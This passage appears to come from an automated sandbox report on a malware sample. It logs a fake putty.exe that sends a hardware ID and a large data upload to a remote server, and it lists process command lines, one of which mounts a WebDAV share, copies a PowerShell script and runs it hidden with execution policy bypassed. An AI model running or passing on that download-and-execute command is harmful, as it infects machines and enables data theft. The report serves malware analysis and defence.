2024-12-13 15:44:01 UTC	1019	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 15:44:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=18q6hmq0om9qbr6eq5o65eee8s; expires=Tue, 08-Apr-2025 09:30:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UqlpXthLpb%2FDv3qi68Xm6uX7raly1s60gJVN1hRj5VFw2xCGG1XrRFXGYXOUuRVm%2B6T%2BUNn3vv1lAvGizRGrYIHwp634HELKLwjOaN9pcTgTjpu%2F3doxK9Lvo8K7%2BbMrgHI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f1712b649d34282-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2083&min_rtt=2083&rtt_var=1041&sent=13&recv=27&lost=0&retrans=1&sent_bytes=4218&recv_bytes=21365&delivery_rate=324877&cwnd=252&unsent_bytes=0&cid=246062efa0ae2ff1&ts=912&x=0"
2024-12-13 15:44:01 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-13 15:44:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.3	49871	172.67.207.38	443	2568	C:\Users\user\AppData\Local\Temp\putty.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:44:03 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=KWHIUOK86 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1161 Host: immureprech.biz
2024-12-13 15:44:03 UTC	1161	OUT	Data Raw: 2d 2d 4b 57 48 49 55 4f 4b 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 34 46 31 35 30 32 44 34 33 42 35 33 30 34 41 41 38 44 45 31 36 41 31 34 35 43 34 33 37 45 38 0d 0a 2d 2d 4b 57 48 49 55 4f 4b 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 57 48 49 55 4f 4b 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 35 35 0d 0a 2d 2d 4b 57 48 49 55 4f 4b 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 Data Ascii: --KWHIUOK86Content-Disposition: form-data; name="hwid"64F1502D43B5304AA8DE16A145C437E8--KWHIUOK86Content-Disposition: form-data; name="pid"1--KWHIUOK86Content-Disposition: form-data; name="lid"BbL7Kk--55--KWHIUOK86Content-Disposi
2024-12-13 15:44:04 UTC	1020	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 15:44:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tiqlt0hvq0d3conr0a4kgtuvlv; expires=Tue, 08-Apr-2025 09:30:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MDcQ4p5%2FEzb40P5copL1xyN8IIj6RPSHLYfqpaXe%2FX1%2BWmBSQ59aQb15iKLxVyEBSWnazJ6rqRlVX6n6%2FQrvRt9q83rO96w%2FdsoYOgIOIz9hl7quLpg6%2F3SXDlxP7T3v%2BRY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f1712c6b9b81a1f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=1999&rtt_var=753&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2068&delivery_rate=1449131&cwnd=228&unsent_bytes=0&cid=570d6ce788a0613c&ts=612&x=0"
2024-12-13 15:44:04 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-13 15:44:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.3	49877	172.67.207.38	443	2568	C:\Users\user\AppData\Local\Temp\putty.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:44:05 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=EUP7FGVZHMD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 569445 Host: immureprech.biz
2024-12-13 15:44:05 UTC	15331	OUT	Data Raw: 2d 2d 45 55 50 37 46 47 56 5a 48 4d 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 34 46 31 35 30 32 44 34 33 42 35 33 30 34 41 41 38 44 45 31 36 41 31 34 35 43 34 33 37 45 38 0d 0a 2d 2d 45 55 50 37 46 47 56 5a 48 4d 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 55 50 37 46 47 56 5a 48 4d 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 35 35 0d 0a 2d 2d 45 55 50 37 46 47 56 5a 48 4d 44 0d 0a 43 6f 6e 74 65 6e 74 Data Ascii: --EUP7FGVZHMDContent-Disposition: form-data; name="hwid"64F1502D43B5304AA8DE16A145C437E8--EUP7FGVZHMDContent-Disposition: form-data; name="pid"1--EUP7FGVZHMDContent-Disposition: form-data; name="lid"BbL7Kk--55--EUP7FGVZHMDContent
2024-12-13 15:44:05 UTC	15331	OUT	Data Raw: fb 17 c5 40 2c c0 7f 32 0b 42 57 85 03 f3 21 c6 f4 33 d0 09 d7 02 fe 3f 8c 79 df 7a 93 18 ba 17 8a 51 d2 b1 1e 8c 04 0d ab 8f fe ad 04 86 bb a1 e9 ff ff 5d 94 9e 58 90 b4 2a 0b 0f 03 58 93 d0 b2 82 e8 b8 41 a0 01 b5 a9 ce 69 59 13 d9 04 de 86 96 ae 0a c3 f9 f7 dd 5d be 84 3e 7e 57 ae 90 dc 5e 60 8b 43 a7 43 94 d9 df 25 1e 9f 01 b3 1c 9d b5 ff 0a f0 b9 f8 56 48 17 8e c2 12 af 8c d5 ea e0 f2 bd 6b d3 b4 8a 4e f5 e3 87 22 e4 d0 ed f1 64 e6 c2 e0 64 f1 59 5e c6 07 e5 b0 26 b1 bc de 2b e8 e7 f2 d6 e3 95 52 60 a6 8d 5c dd 73 9f 7a ff 36 63 33 b7 84 bf e6 9d 3f 1e de 37 1b a1 fc a4 66 9c ed 20 77 c8 3b 79 07 84 41 09 db 81 2b a6 ca 39 35 06 a2 d6 ee a8 f3 5a 29 b9 20 a5 c0 18 d4 d2 d9 e3 bb 7e c7 15 96 a1 f7 81 4b a1 7a e5 eb 6f fa e9 43 f8 d7 a5 93 6f 16 0e 08 Data Ascii: @,2BW!3?yzQ]X*XAiY]>~W^`CC%VHkN"ddY^&+R`\sz6c3?7f w;yA+95Z) ~KzoCo
2024-12-13 15:44:05 UTC	15331	OUT	Data Raw: 9a 6c ab 50 6e 2d 7e 51 31 ec ce 93 64 73 36 73 03 8d 64 32 b3 1d 13 a8 af 02 79 49 14 7b 20 ce 0a 89 6b fe 57 d4 80 6f bb 50 77 01 d6 d4 94 3b 1e ab 34 5e 9b 00 96 32 a8 c4 31 b9 d1 2c f3 60 f9 a3 f0 ba 49 a4 79 22 d1 17 47 c2 2c e8 5e cd 3d aa 3f 17 b5 af d3 1c 0e 6a 37 8e 5b f9 8a 8d f3 f5 47 2c af b2 23 7d 40 e2 b8 ed 15 f9 30 ff 9d 24 d6 e8 c3 18 d2 80 b0 83 af 50 7b e1 3e 4e b6 af d5 24 7f d4 e4 99 f5 9f 58 95 b0 77 2d 47 86 7f 42 e7 c1 03 43 1e 58 9a fa 5e 52 c2 e9 ee cf 15 31 1d be e6 0e c4 51 5f b5 f3 7e 2a 63 49 69 47 e9 a5 2b a9 5a 3c db 85 c7 3f 49 09 6b 2f 97 92 9f 29 61 a2 ef 96 3d bc 6b 11 b7 7e 92 f5 c1 10 81 ca 4d 89 d8 b6 0f e0 91 54 04 b1 4f 6c 4a f3 93 87 ca 93 fa ca 3e e3 fa c3 46 85 08 ce 55 ae 95 ae 53 1d 67 d8 61 22 43 04 67 3f 4d Data Ascii: lPn-~Q1ds6sd2yI{ kWoPw;4^21,`Iy"G,^=?j7[G,#}@0$P{>N$Xw-GBCX^R1Q_~*cIiG+Z<?Ik/)a=k~MTOlJ>FUSga"Cg?M
2024-12-13 15:44:05 UTC	15331	OUT	Data Raw: 49 4f 1d a8 c1 d2 0a 85 97 15 40 fc 98 8a 2f f2 12 68 a0 7c 56 40 75 25 41 3a 09 27 02 04 37 eb 28 71 24 b3 20 8f 65 cd 74 be 35 5c c8 bb 7d 99 d0 95 75 1b b8 be f4 cb 47 dc ff 7c 2b 78 a0 58 3a e7 ec 29 64 67 79 b6 4c 53 72 d0 19 3d d1 85 be 7a 89 f1 f2 01 bf e9 f2 62 21 7c 7e d7 92 5d 38 08 7d 88 9a e6 3e 68 ce fe 0c 30 eb 8b f3 9f b2 68 9c fc 51 ae 15 42 fc fa da 58 ec d7 cd 96 fb be d7 e5 52 92 7d 49 e5 d3 9e 1f b2 ad 54 82 ef e8 29 69 1d 96 ff 32 0b 1c 1c 97 36 52 c2 fa 03 fd 04 04 28 77 b1 3e be 77 88 6e 47 9b 2b 9f 71 97 6f e2 38 dc ca 33 d6 51 dd 05 ff d8 22 ef 2d 32 7b 7a a9 94 22 5e 5c 31 31 eb d6 74 df af d4 af 35 1d f7 a3 5f bb ee e0 e6 31 43 e6 9e 04 f5 f7 ea f3 ec d7 72 ba 7e 0d 09 55 9d 9e 49 bd e6 f3 37 36 a6 5a f4 f1 b5 89 16 df 8e 39 c5 Data Ascii: IO@/h\|V@u%A:'7(q$ et5\}uG\|+xX:)dgyLSr=zb!\|~]8}>h0hQBXR}IT)i26R(w>wnG+qo83Q"-2{z"^\11t5_1Cr~UI76Z9
2024-12-13 15:44:05 UTC	15331	OUT	Data Raw: 61 8f 09 13 b3 b0 a0 d7 2e ac 97 fb f2 81 c4 88 ae cf c2 e7 ab 7b d2 0a 37 c4 27 c4 40 c9 2b 7c e3 f8 0f 06 a1 2f e2 33 3e 12 24 88 90 3c a0 ce 40 18 0e c0 cb 87 0a 82 49 d4 d5 49 8c 4b a5 9e 26 3e e8 21 0f 31 98 8e 8d 9c 33 2a 01 c5 b9 62 ce 51 b0 32 c8 12 23 cb 2f 76 d8 85 aa ad d0 0e 3a a2 c3 d2 ed a8 97 b0 e2 2f 54 b2 e2 8c cd 22 8a cd b3 64 10 a1 fc d7 24 68 1e 66 b7 34 6f e4 9f 73 d2 5f ce 55 d9 a3 a6 5e a9 d6 ba ef 7e d7 bd 71 e8 12 29 6b 7a 5d e0 94 a1 89 d8 15 a1 f5 6c 79 1a 0e 7b c8 24 db 6d 93 ad 5b 24 eb ca da dd 9f f1 c1 92 02 ae c4 cf bb 4e 62 6a 9f c3 72 4a 39 7f 02 6d 29 32 f8 c4 94 f7 b8 73 e6 3d 24 f8 88 cb 68 c0 81 01 a2 d3 b0 ed 41 0a 46 7c f3 9d dc b1 37 37 f5 2c d6 cd 0c 8a af 38 19 78 8f 0c 16 f9 99 e2 90 e5 aa 56 3b ab 8c 9f 31 fe Data Ascii: a.{7'@+\|/3>$<@IIK&>!13*bQ2#/v:/T"d$hf4os_U^~q)kz]ly{$m[$NbjrJ9m)2s=$hAF\|77,8xV;1
2024-12-13 15:44:05 UTC	15331	OUT	Data Raw: 58 8a 7c 4e 62 4c 7d 48 8f 5d 42 01 81 22 d0 8e 83 42 00 ef 29 ef 7b 76 85 31 d2 83 fe 71 db 4f c7 fb 40 e7 59 f8 28 f5 29 75 c0 d5 56 2b f3 c3 82 d2 07 e1 07 48 05 b7 7e df 8f 84 31 2c 49 16 95 c6 3d 32 eb be d1 36 33 43 cb f5 4d 3e fa f9 2e 85 eb 8f 5a a7 be 15 a8 05 77 4f de d1 12 f9 8b fe 63 5f 9e bf 27 52 6a e6 46 af c4 cb 03 dd 4a e1 0b 47 f1 b6 97 38 38 4f ec 89 2f 60 52 2a 0d 6e 11 18 5a 09 9c c1 d8 41 e4 37 ef b6 ba 22 86 77 6c 85 54 cd b9 d4 11 41 6a d6 a4 a5 6c c7 67 5c 56 98 dc 08 16 e7 12 22 68 9a 22 22 cf 89 94 13 f8 8c 1d 18 4c 88 0f 71 12 b7 9e 18 ad 47 80 68 79 6b 1e 1a 19 f0 37 56 aa 23 76 62 e5 ae 15 bc ca 62 12 c1 eb ad 0d cc 02 34 6f 3b a1 80 d6 18 51 b1 be 95 56 35 0d 1b 18 75 ad e4 62 c7 65 ad 9f d7 e9 45 60 a7 ec 66 7e 93 2e 5d 53 Data Ascii: X\|NbL}H]B"B){v1qO@Y()uV+H~1,I=263CM>.ZwOc_'RjFJG88O/`R*nZA7"wlTAjlg\V"h""LqGhyk7V#vbb4o;QV5ubeE`f~.]S
2024-12-13 15:44:05 UTC	15331	OUT	Data Raw: cf ff a4 c9 4b 52 75 2b d6 fa 68 17 c3 5f be 36 3f c5 d5 ce aa fa 71 ae 21 e0 b9 cc 95 8b e1 e5 ae af f3 b6 b4 1e 48 9f 72 89 cf 33 d5 3b 52 48 c4 68 b7 dd 2d 85 23 ce c1 ec 61 d7 b1 03 cf bd 15 18 7a 8d 5a 92 d8 5d ff cc cd d9 2f 3e a9 f9 64 1f bb 87 bb d4 ee be f0 a4 c6 23 6d f1 e2 e1 74 c1 d1 91 c2 e5 e7 fb d3 c3 5f f4 3f 8c e0 40 f3 9f b7 bd 3f 36 b7 d1 3e 68 df ae 95 a7 4d fb af d8 17 fe eb 91 13 dc ab 55 76 42 c5 9e cb 8d ae 9c af d6 f9 55 c6 9d 19 17 bc f1 16 fa 32 ff 5c fb 25 a5 f9 a1 2b 07 91 84 49 5f e8 aa 54 7a 9d 52 8e 0e 4a 44 70 53 3e 42 4e b8 e1 53 c4 3e 65 ef a5 97 29 4c 69 c5 d2 9c a9 e7 8f 94 3a 9b 70 bd 0e 8e 6c eb 9b 10 d8 66 36 0b 6f 9c ec 15 38 f2 f0 ad ca aa 69 91 21 37 b6 42 e8 8d fb 40 d1 41 51 fd 01 62 01 ad d1 00 fa 2f d0 f7 d3 Data Ascii: KRu+h_6?q!Hr3;RHh-#azZ]/>d#mt_?@?6>hMUvBU2\%+I_TzRJDpS>BNS>e)Li:plf6o8i!7B@AQb/
2024-12-13 15:44:05 UTC	15331	OUT	Data Raw: 17 b8 69 ce 2f c5 e4 9b c0 ac 26 7a 40 b6 33 38 72 04 57 ad a7 48 6c 34 61 6e ca fe ed 21 00 f8 d7 31 5b 87 85 73 84 cd f4 f9 46 9a 2a e5 e0 1f f1 91 1f 5c 20 63 59 6e 14 06 29 be 79 5d cc ee 72 25 05 06 5f 5d 78 da 4c 9a da b4 99 b7 4c 4a 4f dd ca 02 89 64 1c 48 14 26 f5 fb c8 d3 f4 75 12 cd 3e d9 de 37 f2 9c 96 54 c2 ec ec e3 81 64 94 62 5f de 0f 72 68 47 5d 44 44 ec fe 16 e7 fd c8 13 a6 86 8e 58 78 77 d0 c4 09 c6 eb 43 22 be 13 7b ff 51 ee bb 9c 11 1d 5e 2e a6 d1 36 9e 0b 27 c9 f2 bf 96 da 7f ea 2b b4 3e 0b bb cb 7e 3b 92 20 6c 22 cb 3e 9f 9f b5 e0 22 c0 3d 1b 5f 79 08 93 bd e0 da 8c 93 23 80 98 b5 b9 69 f4 21 ab af dd de 40 7b ce 84 01 de c8 f9 1f fc fb c6 b5 7b 51 54 00 55 75 b3 1c e9 a4 03 7e 4d 47 93 7a 57 be b3 76 23 00 c7 97 53 30 5b a4 1a a4 34 Data Ascii: i/&z@38rWHl4an!1[sF*\ cYn)y]r%_]xLLJOdH&u>7Tdb_rhG]DDXxwC"{Q^.6'+>~; l">"=_y#i!@{{QTUu~MGzWv#S0[4
2024-12-13 15:44:05 UTC	15331	OUT	Data Raw: d0 77 56 2e 3f 15 1f 66 04 fb 69 0c fc b5 56 df 42 14 db 39 ff 4e a1 fc 50 0c 9b 92 0b 78 1a 6d 8a ef 9c 6e 4c c0 11 48 11 62 4c 70 a8 82 84 c2 b7 f8 75 a1 e6 0a b9 65 91 8d 57 48 15 dd ad 86 f3 c1 cf e6 9c a2 3a 5c aa 4d 50 61 14 c4 47 f9 64 28 b1 80 8d 59 56 15 6c a3 aa b0 00 b2 36 b4 69 43 59 aa 6d 9d d6 03 17 c4 64 37 9b 90 48 4d 70 c1 25 e0 27 99 c6 73 86 56 92 a2 88 58 f6 d9 63 55 46 51 e1 51 d5 09 5f c0 11 c7 88 cb cf 7c 14 7a af c6 4a 2a 65 23 a6 33 3d 12 28 09 9d 10 55 02 88 2a 4c fe 08 af 92 d2 7a 6c cf 03 d8 89 cd 24 83 e3 89 be 4c 3b 5d a5 79 5e 74 61 81 3d 9f 19 8b 90 6b b9 5a 66 30 9d 5a 31 d7 2f 02 7e 4e a0 8b d1 30 ce 75 c5 98 3a 88 1f 05 e3 48 2d ec fa 3d c2 ab b6 ae 84 31 f8 0d b1 2e b8 51 33 ab 66 da 24 a6 13 2f 60 9e 1f bf 4e b3 3f 63 Data Ascii: wV.?fiVB9NPxmnLHbLpueWH:\MPaGd(YVl6iCYmd7HMp%'sVXcUFQQ_\|zJe#3=(ULzl$L;]y^ta=kZf0Z1/~N0u:H-=1.Q3f$/`N?c
2024-12-13 15:44:05 UTC	15331	OUT	Data Raw: 6f a7 0c c7 f7 b9 3f 8c fa ea 7c 49 02 24 81 ec a9 0a 80 1f b4 cc dd 1f 7f f2 bb db 5c 97 3e e4 c9 28 7e b0 9d fc 17 ff d1 24 81 e6 29 4c 37 57 4c de 0f 21 90 46 28 2a f9 d1 a6 a5 2e 69 1c f6 5b e6 df 7b eb 73 df 61 7a 97 d6 69 48 28 13 63 bf 05 a3 30 22 8f 92 ea 13 00 4d e7 03 86 34 64 1f d7 c9 c3 7f 17 08 53 04 c1 08 f8 88 a7 40 ff de 39 23 0b 39 a2 1b ce 17 1b 20 2c ba 75 73 50 56 c0 ca 3b f7 61 24 85 9f a6 9d 25 0a a2 c5 41 62 a2 fb 40 4b 9e fc ef ba ed cd 43 0a 79 0a b7 93 51 7e 16 25 bb 80 45 85 10 e1 d2 fd 18 7c 32 e0 1e b4 3d 16 3b a1 95 79 2d e9 5c aa cd f8 bf 57 95 56 6d 9c da 07 bf 30 8e ec 9c c4 d0 9b 57 5d 2b 60 8a 99 08 70 65 07 e9 11 df 03 4a 8b 9c 59 c3 30 f9 89 f0 b6 1a e9 92 2d bd 6e 1a 0d f4 0b fb a8 88 d5 ef 2b f9 07 f8 e1 5f 65 3e 11 Data Ascii: o?\|I$\>(~$)L7WL!F(*.i[{saziH(c0"M4dS@9#9 ,usPV;a$%Ab@KCyQ~%E\|2=;y-\WVm0W]+`peJY0-n+_e>
2024-12-13 15:44:08 UTC	1021	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 15:44:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o0pb075fkteme6kp8rb89a10jt; expires=Tue, 08-Apr-2025 09:30:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qxxGMMAf0VDwbjFEYsiC3KsnJFAGjtfVgGkWIQ1ZU%2Bgnp2k%2FVSyxbu6FeedomUf4i4P9EjIQyQHsOAuCFBvCoOphAPoDluKSDTYGWnSFh5Z7Q34Jz%2BTh6rjZbBZ%2FN2lULwk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f1712d56f59184d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1604&rtt_var=616&sent=336&recv=603&lost=0&retrans=0&sent_bytes=2839&recv_bytes=571984&delivery_rate=1820448&cwnd=238&unsent_bytes=0&cid=616ee94b2da6c696&ts=2649&x=0"

Target ID:	0
Start time:	10:43:01
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c net use Z: \\todmeng.com@SSL\webdav\ && copy Z:\adv.ps1 C:\Users\user\Documents\adv.ps1 /y && start powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1
Imagebase:	0x7ff739f00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:43:01
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff720030000
File size:	873'472 bytes
MD5 hash:	7366FBEFE66BA0F1F5304F7D6FEF09FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:43:01
Start date:	13/12/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net use Z: \\todmeng.com@SSL\webdav\
Imagebase:	0x7ff7c82c0000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:43:25
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1
Imagebase:	0x7ff6f70b0000
File size:	486'400 bytes
MD5 hash:	DFD66604CA0898E8E26DF7B1635B6326
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:43:25
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff720030000
File size:	873'472 bytes
MD5 hash:	7366FBEFE66BA0F1F5304F7D6FEF09FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:43:39
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\putty.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\putty.exe"
Imagebase:	0x320000
File size:	2'793'736 bytes
MD5 hash:	FCE954E0B8ABEC15C129A54BA33ED2CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:43:39
Start date:	13/12/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\net.exe" use Z: /delete
Imagebase:	0x7ff743e40000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	22
Total number of Limit Nodes:	3

Executed Functions

Function 00007FFB10EB1348 Relevance: 3.0, Strings: 2, Instructions: 490
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3O_I, xrefs: 00007FFB10EB13A4
2O_I, xrefs: 00007FFB10EB14A4

Memory Dump Source

Source File: 0000000B.00000002.1779361963.00007FFB10EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb10eb0000_powershell.jbxd

Similarity

API ID:
String ID: 2O_I$3O_I
API String ID: 0-1954759320
Opcode ID: 99faf1afd131c3cf531fddc4ff84918898cb00523358393a4a48ed4448d33ac9
Instruction ID: ab4fc85fcad1fabbea92399e28e236db265814882b8f4ebd510bfc55d6b8cd53
Opcode Fuzzy Hash: 99faf1afd131c3cf531fddc4ff84918898cb00523358393a4a48ed4448d33ac9
Instruction Fuzzy Hash: AFF103A3E0DE814BE7559679D4562BE6B92EF95371F8800FEE088873DBDD24EC058381

Function 00007FFB11505623 Relevance: 2.2, Strings: 1, Instructions: 923
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H, xrefs: 00007FFB11560FA8

Memory Dump Source

Source File: 0000000B.00000002.1799617923.00007FFB11500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11500000_powershell.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 312c06aa6a5b4f273cd186e16e58eb1c802a81ea9d6de8cd862de129c60b4ac2
Instruction ID: 9e2487ff57b75b8d02418b883f7d852dffe8774f4bba4e132e6ea8cfb53a5522
Opcode Fuzzy Hash: 312c06aa6a5b4f273cd186e16e58eb1c802a81ea9d6de8cd862de129c60b4ac2
Instruction Fuzzy Hash: E372D9B1D18A598FEBA4EB28C8957A9B7A2FF58351F4041F9D40DD3292DE346D81CF80

Function 00007FFB10EC1F7B Relevance: 1.9, Instructions: 1940
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1779361963.00007FFB10EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb10eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: badcb1d800819315055fda3afd8799c2fdc65f4bb429b9aa670a374245dba686
Instruction ID: b1ea7de5ea3035a6ae2417a797cbca8fc27051a15d481f58e30d060220cfb758
Opcode Fuzzy Hash: badcb1d800819315055fda3afd8799c2fdc65f4bb429b9aa670a374245dba686
Instruction Fuzzy Hash: BBF2EA71E1891D8FEB98EB2CC895BA9B3A2FB99304F5041F9940DD7391CE35AD818F41

Function 00007FFB10EB2BBA Relevance: 1.7, APIs: 1, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1779361963.00007FFB10EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb10eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf02f584697c5aacae98049c99171ce440d17102520187edc726bec13eec223d
Instruction ID: d0fd728019dfcfb4079883589795587dc7848cf7582ffc1567c2a9eb54948396
Opcode Fuzzy Hash: cf02f584697c5aacae98049c99171ce440d17102520187edc726bec13eec223d
